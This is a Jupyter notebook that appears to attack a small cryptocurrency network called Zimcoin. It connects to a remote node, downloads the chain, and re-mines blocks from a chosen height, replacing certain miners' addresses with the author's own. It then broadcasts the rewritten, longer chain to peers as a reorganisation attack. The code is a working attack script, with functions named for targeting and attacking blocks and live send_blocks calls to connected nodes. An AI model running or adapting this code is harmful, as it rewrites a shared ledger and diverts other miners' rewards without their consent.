# 0x0A Hack Commandments

In [1]:
import math
import time
from tqdm.notebook import tqdm
from sqlitedict import SqliteDict
from zimcoin_miner import ZimcoinMiner
from blocks import Block
from blocks import mine_block
from persistence import Persistence, dict_to_block
from node import Node
from connections import run_server, remote_connection
from blockchain_state import BlockchainState, verify_reorg

In [2]:
MINER_ADDRESS = bytes.fromhex('501ace0000000000000000000000000000000000')

## Test Persistance

In [3]:
# file_name = "0x00_test.sqlite"
# persistence = Persistence.start(file_name).proxy()

### Save a test block

In [4]:
# height = 0
# previous_block = bytes.fromhex('0000000000000000000000000000000000000000000000000000000000000000')
# timestamp=1659431332

# # mine a blocks
# for index in range(2):
#     # mine the block
#     block = mine_block(
#         previous= previous_block,
#         height=height,
#         miner=MINER_ADDRESS,
#         transactions=[],
#         timestamp=1659431332,
#         difficulty=1000000000)

#     # save the block
#     persistence.save_block(block).get()

#     # get ready for the next block
#     height += 1
#     previous_block = block.block_id
#     timestamp += 120

### Get Persistance Blocks

In [5]:
# blocks = persistence.get_blocks().get()
# for block in blocks:
#     print(block.block_id.hex())

## Remote Connection

In [7]:
REMOTE_NODES = ["ws://node.zimcoin.org:46030/"]
#node = Node.start("./0x00_connecting.sqlite").proxy()
node = Node.start("./0x01_connecting.sqlite").proxy()
for remote in REMOTE_NODES:
    remote_connection(node, remote)


Sending {"type": "update_state", "height": 0, "block_id": null, "total_difficulty": 0}
Sending {"type": "get_transactions"}
Got message {'type': 'update_state', 'height': 3149, 'block_id': '00000018b3e26ea929f78802b99037a82b42f3b98c2c4e4a07ffa11f82d7d14b', 'total_difficulty': 8659308546440}
Sending {"type": "update_state", "height": 0, "block_id": null, "total_difficulty": 0}
Sending {"type": "get_blocks", "start": -25, "end": 25}
Got message {'type': 'transactions', 'transactions': []}
Got message {'type': 'blocks', 'blocks': [{'previous': '0000000000000000000000000000000000000000000000000000000000000000', 'height': 0, 'miner': 'bcf177e59d90d6c647918a0882c672be8b1fe289', 'transactions': [], 'timestamp': 1659431332, 'difficulty': 1000, 'block_id': '001752953780439af7ad106e1aea94b1f855cad279868d65bbb590071385d9c2', 'nonce': 521}, {'previous': '001752953780439af7ad106e1aea94b1f855cad279868d65bbb590071385d9c2', 'height': 1, 'miner': 'bcf177e59d90d6c647918a0882c672be8b1fe289', 'transaction

In [ ]:
persistence = Persistence.start('./0x00_connecting.sqlite').proxy()
blocks = persistence.get_blocks().get()
for block in blocks:
    print(block.height, block.block_id.hex())

In [ ]:
exclude_list = [
    bytes.fromhex('fe45ad6d493c6ed34fa321f02d30e65479b9faa6'),
    bytes.fromhex('faac0ffe45ad6d493c6ed34fa321f02d30e65479'),
    bytes.fromhex('fe45ad6d493c6ed34fa321f02d30e65479b9faaa'),
    bytes.fromhex('0000000000000000000000000000000000000000')
]


def get_target_blocks(start_height : int,
                      file_name : str) -> list:
    """
    Get a list of the blocks to attack.
    """
    attack_blocks = []
    blocks = Persistence.start(file_name).proxy().get_blocks().get()

    for block in tqdm(blocks, 'Getting target attack blocks'):
        if block.height >= start_height:
            attack_blocks.append(block)

    return attack_blocks

def attack_blocks(attack_blocks : list,
                  exclude_list : list,
                  attack_persistence : Persistence,
                  previous_block : bytes = None) -> None:
    """
    Attack the blocks and replace the miner address of miners in the 
    exclude list.
    """
    # create tme miner
    block_miner = ZimcoinMiner(
        platform_id=0,
        device_id=0,
        window_size=1e5)

    if previous_block is None:
        previous_block = attack_blocks[0].previous

    for block in tqdm(attack_blocks, 'Attacking blocks'):
        # determine the miner address to replace
        miner = block.miner if block.miner not in exclude_list else MINER_ADDRESS

        # mine the attacked block
        attacked_block = block_miner.mine(
            previous = previous_block,
            height = block.height,
            miner = miner,
            transactions = block.transactions,
            timestamp = block.timestamp,
            difficulty = block.difficulty)

        # save the attacked block
        previous_block = attacked_block.block_id
        print("Saving block", attacked_block.block_id.hex())
        attack_persistence.save_block(attacked_block)
        
def attack_range(start_height: int, previous_block : bytes) -> None:
    block_list = get_target_blocks(start_height, './0x00_connecting.sqlite')
    print(f'Attack Block Count : {len(block_list)}')

    # create a database for the output
    attack_file_name = "./0x01_attack.sqlite"
    # attack the blocks
    attack_blocks(
        attack_blocks=block_list, 
        exclude_list=exclude_list,
        attack_persistence=Persistence.start(attack_file_name).proxy(),
        previous_block=previous_block)


# get the blocks to attack blocks
ATTACK_START = 1638 + 100
#start_height = ATTACK_START
#previous_block = None

start_height = 3147 
previous_block = bytes.fromhex('00000041632195a4827fd92a4578cd6189d890689b4ccd58cd6bd17278226c63')
attack_range(start_height, previous_block)

In [ ]:
height = ATTACK_START
attacked_blocks = []
db = SqliteDict('./0x01_attack.sqlite', autocommit=True)
while True:
    block_dict = db.get(height)
    if block_dict is None:
        break
    attacked_blocks.append(dict_to_block(block_dict))
    height += 1

print(f'Attacked Block Count : {len(attacked_blocks)}')
print(f'First Block Height : {attacked_blocks[0].height}')
print(f'First block difficulty : {attacked_blocks[0].difficulty}')
print(f'Last block height : {attacked_blocks[-1].height}')

In [ ]:
# get the existing list
existing_list = get_target_blocks(0, './0x00_connecting.sqlite')
existing_list = existing_list[:attacked_blocks[0].height]
print(f'Existing List last block height : {existing_list[-1].height}')
print(f'Attack List first block height : {attacked_blocks[0].height}')

# mine a new block to add next to the attacked blocks
new_block = mine_block(
    previous= attacked_blocks[-1].block_id,
    height=attacked_blocks[-1].height + 1,
    miner=MINER_ADDRESS,
    transactions=[],
    timestamp=int(time.time()),
    difficulty=node.get_current_difficulty().get())

# add to the attacked blocks
attacked_blocks.append(new_block)

# send the blocks to the nodes
existing_list.extend(attacked_blocks)
print(f'Existing List Block Count : {len(existing_list)}')

# create a new state
new_state = BlockchainState([], dict(), 0)
for block in tqdm(existing_list, 'Building New State'):
    new_state.verify_and_apply_block(block)
    #print(block.height, block.block_id.hex())

# send the blocks
# node.blockchain_state = new_state

# new_state_summary = node.state_summary().get()
# print(new_state_summary)

for connection in node.connections.get():
    print(connection)
    print(connection.proxy().send_blocks(existing_list).get())

time.sleep(10*60)


In [ ]:

for connection in node.connections.get():
    print(connection)
    print(connection.proxy().send_blocks([]).get())

In [ ]:
# new_state_summary.block_id
# # if summary.block_id is None:
# #     block_id = None
# # else:
# #     block_id = summary.block_id.hex()
# # self.send(json.dumps(dict(
# #     type='update_state',
# #     height=summary.height,
# #     block_id=block_id,
# #     total_difficulty=summary.total_difficulty
# # )))

In [ ]:
# existing_list = get_target_blocks(0, './0x00_connecting.sqlite')
# existing_list = existing_list[:attacked_blocks[0].height -1]

# print(f'Existing List Block Count : {len(existing_list)}')
# print(f'Attacked List Block Count : {len(attacked_blocks)}')

# existing_list.extend(attacked_blocks)
# print(f'Existing List Block Count : {len(existing_list)}')


## Lets do A LOT

In [ ]:
# # create the database
# file_name = "0x01_boot.sqlite"
# persistence = Persistence.start(file_name).proxy()

# # set the genesis block
# height = 2646
# previous_block = bytes.fromhex('0000003c92b26061a6ee09a8b481f23cfb1d318b168f5529f8af469c33179cac')
# timestamp=1659821466

# # mine some blocks
# n = 1000
# for index in tqdm(range(n)):
#     block = mine_block(
#         previous= previous_block,
#         height=height,
#         miner=MINER_ADDRESS,
#         transactions=[],
#         timestamp=timestamp,
#         difficulty=42350000)

#     # save the blockr
#     persistence.save_block(block)

#     # get ready for the next block
#     height += 1
#     previous_block = block.block_id
#     timestamp += 120

In [ ]:
# # create the database
# file_name = "0x01_boot.sqlite"
# persistence = Persistence.start(file_name).proxy()

# # set the genesis block
# height = 0
# previous_block = bytes.fromhex('0000000000000000000000000000000000000000000000000000000000000000')
# timestamp=1659431332

# # mine some blocks
# n = 4500
# for index in tqdm(range(n)):
#     block = mine_block(
#         previous= previous_block,
#         height=height,
#         miner=MINER_ADDRESS,
#         transactions=[],
#         timestamp=timestamp,
#         difficulty=1000000000)

#     # save the blockr
#     persistence.save_block(block)

#     # get ready for the next block
#     height += 1
#     previous_block = block.block_id
#     timestamp += 120